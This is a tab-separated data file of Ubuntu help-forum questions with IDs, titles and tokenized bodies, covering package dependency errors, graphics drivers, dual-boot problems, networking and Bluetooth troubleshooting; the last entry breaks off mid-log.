335267	1 day folder on my webserver lost permissions	i 've ubuntu server 12.04 . i try to upload image on one of my wp installations on this box , and i get permission error ( worked perfectly few days back ) . i log in and check permissions and i see ownership 1632 1673 . i quickly fixed it by running chown -r www-data : www-data . but i do n't understand how this could happen in the first place . should i be worried about security ? or this can happen on unix from time to time ?
335268	load installed win7 within ubuntu	i have installed win7 , and after installed win7 , i installed the ubuntu 13.04 and always using ubuntu , but some times want to run some application that i installed those on win7 , like photoshop i know ubuntu have gimp that is like photoshop , but i mostly familiar with photoshop , and not have times for learn gimp is it possible to load win7 that i installed it within ubuntu ? if yes , exactly how ? thanks
335273	problems with amd graphics driver installation on ubuntu 12.04	i installed ubuntu 12.04 on my desktop with two screens , but one of the screens has not been detected . as far as i understand the problem comes from the wrong video card driver , so i followed the instructions to install the video driver for radeon hd2400 . as a result i have the following : in system details i see that the graphics is vesa : rv610 ( which is correct ) , but the fglrxinfo command gives me the following : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 153 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 and when i try to launch catalyst control centre i get : there was a problem initializing catalyst control center linux edition . it could be caused by the following . there is n't any installed amd graphics driver , or the amd driver is not functioning properly . please install the amd driver appropriate for you amd hardware , or configure using aticonfig . in the additional drivers menu i see that `` no proprietary drivers are in use on this system . '' how can i fix this ?
335279	unmet dependencies while installing fbreader	i was installing fbreader in ubuntu 12.04 , but it showed that some packages are broken and have unmet dependencies , so fbreader was n't installed . moreover , software center started to show repair package catalogue dialogue , but when i tried to repair , nothing happened . i am unable to install anything because of the error . i tried sudo apt-get autoremove and then sudo apt-get -f install , but did n't help . when i run sudo apt-get autoremove , the following are shown in the terminal : the following packages have unmet dependencies : fbreader : depends : libzlcore0.12 but it is not installed libzltext0.12 : depends : libzlcore0.12 ( = 0.12.10dfsg-6 ) but it is not installed libzlui-qt4 : depends : libzlcore0.12 ( = 0.12.10dfsg-6 ) but it is not installed please help . when i tried to do repair via the software center , follwoing error report was given : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 228249 files and directories currently installed . ) unpacking libzlcore0.12 ( from ... /libzlcore0.12_0.12.10dfsg-6_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libzlcore0.12_0.12.10dfsg-6_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/libzlcore.so.0.12.10 ' , which is also in package libzlcore 0.12.10-1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libzlcore0.12_0.12.10dfsg-6_i386.deb error in function : dpkg : dependency problems prevent configuration of libzltext0.12 : libzltext0.12 depends on libzlcore0.12 ( = 0.12.10dfsg-6 ) ; however : package libzlcore0.12 is not installed . dpkg : error processing libzltext0.12 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libzlui-qt4 : libzlui-qt4 depends on libzlcore0.12 ( = 0.12.10dfsg-6 ) ; however : package libzlcore0.12 is not installed . dpkg : error processing libzlui-qt4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of fbreader : fbreader depends on libzlcore0.12 ; however : package libzlcore0.12 is not installed . fbreader depends on libzltext0.12 ; however : package libzltext0.12 is not configured yet . fbreader depends on libzlui-qt4 ( > = 0.12.10dfsg-6 ) | libzlui-gtk ( > = 0.12.10dfsg-6 ) ; however : package libzlui-qt4 is not configured yet . package libzlui-gtk is not installed . dpkg : error processing fbreader ( -- configure ) : dependency problems - leaving unconfigured
335281	after installing lubuntu , windows xp does not boot	i recently successfully installed and ran lubuntu alongside windows xp . however when i tried to boot windows xp , i got the following error message : windows could not start because the following file is missing or corrupt < windows root > \system32\ntoskrnl.exe please re-install a copy of the above file . is there any way to correct this problem without inserting a windows cd ?
335283	how to reslove unmet dependencies ? can not install or remove packages/software	$ sudo apt-get -f install google-chrome-stable i tried to install java in ubuntu but it 's not successfully installed but after that when i am trying to install/remove any other package/soft . every time i m getting these errors . reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : bleachbit : depends : menu but it is not going to be installed ca-certificates-java : depends : openjdk-6-jre-headless ( > = 6b16-1.6.1-2 ) or java6-runtime-headless icedtea-6-plugin : depends : openjdk-6-jre icedtea-netx : depends : openjdk-6-jre ( > = 6b23~pre10~ ) or openjdk-7-jre **e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . ** when i run the sudo dpkg -- configure -a to get the all dependencies , i found : dpkg : dependency problems prevent configuration of icedtea-netx : icedtea-netx depends on openjdk-6-jre ( > = 6b23~pre10~ ) | openjdk-7-jre ; however : package openjdk-6-jre is not installed . package openjdk-7-jre is not installed . dpkg : error processing icedtea-netx ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of bleachbit : bleachbit depends on python-central ( > = 0.6.7 ) ; however : package python-central is not installed . bleachbit depends on menu ; however : package menu is not installed . dpkg : error processing bleachbit ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ca-certificates-java : ca-certificates-java depends on openjdk-6-jre-headless ( > = 6b16-1.6.1-2 ) | java6-runtime-headless ; however : package openjdk-6-jre-headless is not installed . package java6-runtime-headless is not installed . dpkg : error processing ca-certificates-java ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of icedtea-6-plugin : icedtea-6-plugin depends on openjdk-6-jre ; however : package openjdk-6-jre is not installed . icedtea-6-plugin depends on icedtea-netx ( = 1.2-2ubuntu1 ) ; however : package icedtea-netx is not configured yet . dpkg : error processing icedtea-6-plugin ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : icedtea-netx bleachbit ca-certificates-java icedtea-6-plugin when i open ubuntu soft . center to install/remove any package/soft . i also got this error : - package dependencies can not be resolved the following packages have unmet dependencies : bleachbit : depends : python ( > = 2.4 ) but 2.7.3-0ubuntu2 is installed depends : python-gtk2 ( > = 2.6 ) but 2.24.0-3 is installed depends : python-central ( > = 0.6.7 ) but it is not installed depends : menu but it is not installed ca-certificates-java : depends : java6-runtime-headless but it is a virtual package icedtea-6-plugin : depends : openjdk-6-jre but it is not installed depends : icedtea-netx ( = 1.2-2ubuntu1 ) but 1.2-2ubuntu1 is installed depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10.3 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libglib2.0-0 ( > = 2.31.8 ) but 2.32.3-0ubuntu1 is installed depends : libgtk2.0-0 ( > = 2.8.0 ) but 2.24.10-0ubuntu6 is installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is installed icedtea-netx : depends : icedtea-netx-common ( > = 1.2-2ubuntu1 ) but 1.2-2ubuntu1 is installed depends : openjdk-7-jre but it is not installed
335285	how to change proprietary video driver using the command line ?	my laptop computer has a nvidia video card and runs ubuntu 12.04 lts 64-bit . during an upgrade yesterday it seemed as a new nvidia driver version 304 ( if i remember correct ) was installed . after upgrade and reboot , i opened the additional driver tool and found that the nvidia driver version 304 was in use . so far so good . however , the additional driver tool also reported that there existed a nvidia driver version 319 and that this driver version was recommended . i then selected to change to this recommended driver , the driver was downloaded and installed , i rebooted the system and ended up with a black screen and a command shell . how to change proprietary nvidia video driver using the command line and revert back to the previous version that worked on my system ? ( a second question : how can it be that a video driver that apparently does not work was recommended ? )
335287	how do i find and mount my windows drive in ubuntu ?	i went to the home folder and looked under devices but there is no windows drive .
335292	avconv does not support setting profile for mp4/h264/aac	hi i am trying to convert a wmv video to mp4 using h264 baseline profile . avconv -i 'video2.wmv ' \ -vcodec libx264 -preset ultrafast -profile baseline \ -acodec aac -strict experimental \ -r 24 -b 255k -ar 44100 -ab 59k 'video2.mp4' but it is showing following errors : [ aac @ 0x707e40 ] [ eval @ 0x7fff0c8db800 ] undefined constant or missing ' ( ' in 'baseline' [ aac @ 0x707e40 ] unable to parse option value `` baseline '' [ aac @ 0x707e40 ] error setting option profile to value baseline . profile setting is causing the errors . if i run the command : avconv -i 'video2.wmv ' \ -vcodec libx264 -preset ultrafast \ -acodec aac -strict experimental \ -r 24 -b 255k -ar 44100 -ab 59k 'video2.mp4' then it works fine . what is the correct method of setting h264 profile in avconv command ? running ubuntu 13.04 and latest libavtools
335294	how to export ppt/pptx to pdf without background image in libre office impress ?	when i export ppt to pdf , the background image also gets converted as a part of the pdf . is there an option to disable inclusion of background images ? can this be done via terminal ?
335297	kind-of messed up /usr/share/icons	i have a little problem with my icons on 12.04 : d i was installing an application from a tar-archieve but the icons for that special application were missing . so i looked up the tar again and found a subfolder /share/icons/48x48/ which sould ( and thats the point , it should , but does not ) fit into /usr/share/icons . so i just ran sudo cp -rf ./share/icons /usr/share/ that worked for the particular application ( monodevelop 4 ) . but now , various icons are missing like banshee , software-center , audacity , adoure , vlc and so on ... ( but not all , half of them are still in place ! ) i checked the permissions on /usr/share/icons and its all ok. what has gone wrong here and any ideas on how to fix this ? thnx ; )
335299	what does nt_status_more_processing_required mean when using smbclient to connect to a samba share ?	symptoms : you can mount a netapp 'shared drive ' using the mount program fine . but if you try to browse it using smbclient , you get this error when it fails to connect : session setup failed : nt_status_more_processing_required ubuntu 11.04
335301	how to correctly write hosts file to redirect to ip with subdirectory	hello i 'm not really new to linux , but i stumbled upon a problem when i copied website on localhost/subdirectory . the homepage is runing normaly but the links redirect to root of the server i.e . localhost/en/rest-of-the-link and not localhost/subdirectoryen/rest-of-the-link . how can i add ip with subdirectory in hosts file ?
335305	nautilus - how to duplicate the current window	sometimes i need to open the same directory twice . if i try to open it from a bookmark , nautilus sees it is already opened so it simply focuses it . if i do ctrl + n , the new window opens home . is there a simple way to duplicate the current nautilus window ( just keeping the same directory ) ?
335317	deactivated touchpad - how to activate ?	i just mindlessly deactivated my touchpad in ubuntu 13.04 through the gnome-control-center and have no clue how to activate it again without the use of the touchpad . also synclient touchpadoff=0 does n't change anything .
335318	redirect url to return same content	i need to run a test application that loads many images from an external url . during tests i do n't want to access to the external url , so every time it tries to load an image in this way : < img src= '' www.externaldomain/somewhere/image1.jpg '' > < img src= '' www.externaldomain/from/there/image2.gif '' > etc . it will get a `` local '' image ( always the same image ) from the same server that is running the test application . how can i get that in ubuntu 12.04 ?
335320	login using nfs and ldap only after about 2 minutes possible	setup : nfs & ldap server ubuntu 10.04 client ubuntu 13.04 after starting the client login is only possible after about 2 minutes . problem seems missing home ( mounted via nfs v4 ) . what can i do ?
335321	bash function named with the question mark char does not work anymore	in ubuntu 11.10 i had a bash command/alias/function like : function ? ( ) { xxx $ 1 } this worked like a charm . now in ubuntu 13.04 it does n't work anymore . when i try to execute the command with some argument i get : 0 : command not found what has changed that i can not use this abbreviation anymore ? p.s . of course it 's possible to change the alias name , it 's just a question out of curiousity .
335326	how to undo apt actions	some times i manually install some '.deb ' files using dpkg -i *.deb and the apt get broken . so i want to undo last ( sometime more ) operation . how can i do it
335328	i can not connect intenet through dongle	i am using vodafone dongle but when i am using it , it is detected inside computerwhile connecting take long time but can not connect to internet
335330	skype freezes sporadically	i 've been having the problem ever since i started using skype on ubuntu , some two years ago . i 'm always thinking that they will fix it with the next update , but no . from time to time , it will randomly freeze eating up all free cpu time , and i have to kill it from system monitor and re-run it . is there a work-around for this , as i 'll be soon needing my skype to work for me without crashing . thanks in advance !
335335	plymouth theme broken , ca n't fixed it	couple days ago i tried to install plymouth theme using super boot manager but it encountered some errors , now every time i try to install new app using apt-get i get this error . this is full log : sudo apt-get install -f [ sudo ] password for alen : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libdigest-crc-perl libgstreamer-perl libgtk2-notify-perl libgtk2-trayicon-perl libintl-perl libqt5versit5 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 13 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up plymouth-theme-mib-ubuntu ( 0.5.0-2 ) ... update-alternatives : error : alternative path /lib/plymouth/themes/mib-ubuntu/mib-ubuntu.plymouth does n't exist dpkg : error processing plymouth-theme-mib-ubuntu ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : plymouth-theme-mib-ubuntu
335337	reboot stuck on `` [ 1534.028775 ] restarting system ''	i just did a fresh install of 13.04 , after hearing great comments from people . the experience was great overall , but the only problem i have is that while rebooting , a black terminal-styled reboot comes up . all tasks had [ ok ] checked behind it , i 'm just stuck on the `` restarting system ... '' so i always have to do a hard reboot using power button . however , shutdown works just fine . i am using a 64-bit windows 7 dual boot config and using a acer aspire v3-471g . any answer or solution will be greatly appreciated .
335339	ubuntu 12.04 booting problems probably due to nvidia	i reinstalled windows 7 and ubuntu 12.04 on my system 2 days back . both os were working fine . yesterday i installed nvidia graphic card on windows 7 and i switched to ubuntu after rebooting it , ubuntu did not boot ( it says nouvea i2wc faill ... . ) . i have installed ubuntu on a seperate partition
335348	should all ubuntu touch apps use a mainview ?	i know the mainview component is the recommended container for all widgets that are part of an ubuntu touch app . however , i 'd like to understand whether it is essential to use it and what it brings to an app . from the documentation : mainview is the root item that should be used for all applications . it automatically adds a header and toolbar for its contents and can rotate its content based on the device orientation . basically , i 'd like to know exactly what features or properties mainview adds to an ubuntu touch app and if it 's a strict requirement to use it to write convergent apps for ubuntu . a use case would be for an app that does not need a header .
335352	how to change ip address in ubuntu desktop through command line	in ubuntu desktop 13.04 changing /etc/network/interfaces file do n't change ip address or convert dhcp to static network interface configuration . after changing the file i tried sudo service networking restart -- -- -- -- -- edit -- -- -- -- -- i have connected to system with ssh .
335355	notebook screen does n't shut down correctly	i set the notebook screen to shut down after 10 minutes of inactivity ( in system settings ) but the screen does n't shut down , it goes black like if it was displaying a black a black page but is n't shutted down . i tried running `` system test '' and it can correctly shutdown my screen . the notebook is a toshiba c855-233 and i 'm using ubuntu 13.10
335362	how to host a project on launchpad ?	i want to create a python project and host it on launchpad . i have already produced python code . what i want to know is : how can put it on launchpad ? how can i make a ppa for it ?
335364	bluetooth not working !	i am running gnome 3.6 and kde 4.10.5 on ubuntu 13.04 on an asus x53u . the computer can boot in windows 7 ( from grub ) . in windows , i can turn bluetooth on and off and use it . in ubuntu ( i tried both gnome and kde ) , however , it shows no bluetooth adapters found . output of dmesg from the first occurance of bluetooth till the last is : [ 17.148762 ] sp5100_tco : sp5100/sb800 tco watchdog timer driver v0.05 [ 17.149343 ] sp5100_tco : pci revision id : 0x42 [ 17.149413 ] sp5100_tco : using 0xfed80b00 for watchdog mmio address [ 17.149430 ] sp5100_tco : last reboot was not triggered by watchdog . [ 17.150320 ] sp5100_tco : initialized ( 0xf8434b00 ) . heartbeat=60 sec ( nowayout=0 ) [ 17.576700 ] bluetooth : core ver 2.16 [ 17.576782 ] net : registered protocol family 31 [ 17.576789 ] bluetooth : hci device and connection manager initialized [ 17.576810 ] bluetooth : hci socket layer initialized [ 17.576822 ] bluetooth : l2cap socket layer initialized [ 17.576845 ] bluetooth : sco socket layer initialized [ 17.582971 ] cfg80211 : calling crda to update world regulatory domain [ 17.662956 ] usbcore : registered new interface driver btusb [ 17.947386 ] fglrx : module license 'proprietary . ( c ) 2002 - ati technologies , starnberg , germany ' taints kernel . [ 17.995173 ] microcode : cpu0 : patch_level=0x0500010d [ 18.127043 ] linux video capture interface : v2.00 [ 18.189692 ] < 6 > [ fglrx ] maximum main memory to use for locked dma buffers : 1507 mbytes . [ 18.190091 ] < 6 > [ fglrx ] vendor : 1002 device : 9807 count : 1 [ 18.191340 ] < 6 > [ fglrx ] ioport : bar 1 , base 0xf000 , size : 0x100 [ 18.229984 ] < 6 > [ fglrx ] kernel pat support is enabled [ 18.230061 ] < 6 > [ fglrx ] module loaded - fglrx 9.1.11 [ dec 19 2012 ] with 1 minors [ 18.466713 ] microcode : cpu1 : patch_level=0x0500010d [ 18.467606 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 18.481120 ] psmouse serio1 : elantech : assuming hardware version 3 ( with firmware version 0x550f00 ) [ 18.503348 ] psmouse serio1 : elantech : synaptics capabilities query result 0x78 , 0x17 , 0x0b . [ 18.586556 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro [ 18.623024 ] input : etps/2 elantech touchpad as /devices/platform/i8042/serio1/input/input6 [ 18.687803 ] ath : eeprom regdomain : 0x60 [ 18.687815 ] ath : eeprom indicates we should expect a direct regpair map [ 18.687824 ] ath : country alpha2 being used : 00 [ 18.687829 ] ath : regpair used : 0x60 [ 18.720972 ] uvcvideo : found uvc 1.00 device chicony cnfa078 ( 04f2 : b23b ) [ 18.758068 ] input : chicony cnfa078 as /devices/pci0000:00/0000:00:12.2/usb1/1-3/1-3:1.0/input/input7 [ 18.758333 ] usbcore : registered new interface driver uvcvideo [ 18.758341 ] usb video class driver ( 1.1.1 ) [ 18.871787 ] kvm : nested virtualization enabled [ 18.871800 ] kvm : nested paging enabled [ 19.082721 ] ieee80211 phy0 : selected rate control algorithm 'minstrel_ht' [ 19.083758 ] ieee80211 phy0 : atheros ar9285 rev:2 mem=0xf88a0000 , irq=17 [ 19.167027 ] cfg80211 : world regulatory domain updated : [ 19.167043 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 19.167051 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 19.167058 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 19.167065 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 19.167072 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 19.167078 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 19.199140 ] snd_hda_intel 0000:00:01.1 : irq 41 for msi/msi-x [ 19.070706 ] asus_wmi : asus wmi generic driver loaded [ 19.234976 ] asus_wmi : initialization : 0x1asus_wmi : bios wmi version : 7.6 [ 19.235322 ] asus_wmi : sfun value : 0x1a0877 < 6 > [ 19.258763 ] input : asus wmi hotkeys as /devices/platform/asus-nb-wmi/input/input8 [ 19.270193 ] asus_wmi : backlight controlled by acpi video driver [ 19.307334 ] input : hd-audio generic hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.1/sound/card0/input9 [ 19.456027 ] input : hda ati sb mic as /devices/pci0000:00/0000:00:14.2/sound/card1/input10 [ 19.456747 ] input : hda ati sb headphone as /devices/pci0000:00/0000:00:14.2/sound/card1/input11 [ 19.720317 ] ext4-fs ( sda7 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 20.193681 ] init : failsafe main process ( 833 ) killed by term signal [ 20.697201 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 20.697214 ] bluetooth : bnep filters : protocol multicast [ 20.697238 ] bluetooth : bnep socket layer initialized [ 20.761224 ] type=1400 audit ( 1378603091.832:5 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=913 comm= '' apparmor_parser '' [ 20.763089 ] type=1400 audit ( 1378603091.832:6 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=913 comm= '' apparmor_parser '' [ 20.763562 ] type=1400 audit ( 1378603091.836:7 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=912 comm= '' apparmor_parser '' [ 20.764218 ] type=1400 audit ( 1378603091.836:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=913 comm= '' apparmor_parser '' [ 20.764935 ] type=1400 audit ( 1378603091.836:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper//chromium_browser '' pid=912 comm= '' apparmor_parser '' [ 20.787719 ] type=1400 audit ( 1378603091.860:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=916 comm= '' apparmor_parser '' [ 20.789927 ] type=1400 audit ( 1378603091.860:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=916 comm= '' apparmor_parser '' [ 20.855207 ] bluetooth : rfcomm tty layer initialized [ 20.855245 ] bluetooth : rfcomm socket layer initialized [ 20.855252 ] bluetooth : rfcomm ver 1.11 [ 21.184202 ] init : avahi-cups-reload main process ( 936 ) terminated with status 1 windows gives the following data about bluetooth : port_ # 0004.hub- # 0001 address : 44:6d:57:14:98:13 mfg . id : 69 hci v. 5.39321 lmp v. 5.39321 driver provider : atheros comm . driver date : 27.09-2011 driver version : 7.4.0.98 here is the output of rfkill list all : 1 : phy0 : wireless lan soft blocked : no hard blocked : no 8 : hci0 : bluetooth soft blocked : no hard blocked : no the output of lsusb is : bus 001 device 002 : id 04f2 : b23b chicony electronics co. , ltd bus 004 device 009 : id 04ca:3002 lite-on technology corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub the output of lspci is : 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati wrestler [ radeon hd 6290 ] 00:01.1 audio device : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] 00:04.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 42 ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:15.0 pci bridge : advanced micro devices [ amd ] nee ati sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:15.1 pci bridge : advanced micro devices [ amd ] nee ati sb700/sb800/sb900 pci to pci bridge ( pcie port 1 ) 00:16.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 06 ) 04:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) here is more data : the output of hcitool dev is just devices : the output of hcitool scan vhen there was a visible bluetooth device right next to the computer is device is not available : no such device the output of lsusb -vvv -d 04ca:3002 is : bus 004 device 011 : id 04ca:3002 lite-on technology corp. could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 224 wireless bdevicesubclass 1 radio frequency bdeviceprotocol 1 bluetooth bmaxpacketsize0 64 idvendor 0x04ca lite-on technology corp. idproduct 0x3002 bcddevice 0.01 imanufacturer 0 iproduct 0 iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 177 bnuminterfaces 2 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 3 binterfaceclass 224 wireless binterfacesubclass 1 radio frequency binterfaceprotocol 1 bluetooth iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0010 1x 16 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 2 binterfaceclass 224 wireless binterfacesubclass 1 radio frequency binterfaceprotocol 1 bluetooth iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0000 1x 0 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0000 1x 0 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 1 bnumendpoints 2 binterfaceclass 224 wireless binterfacesubclass 1 radio frequency binterfaceprotocol 1 bluetooth iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0009 1x 9 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0009 1x 9 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 2 bnumendpoints 2 binterfaceclass 224 wireless binterfacesubclass 1 radio frequency binterfaceprotocol 1 bluetooth iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0011 1x 17 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0011 1x 17 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 3 bnumendpoints 2 binterfaceclass 224 wireless 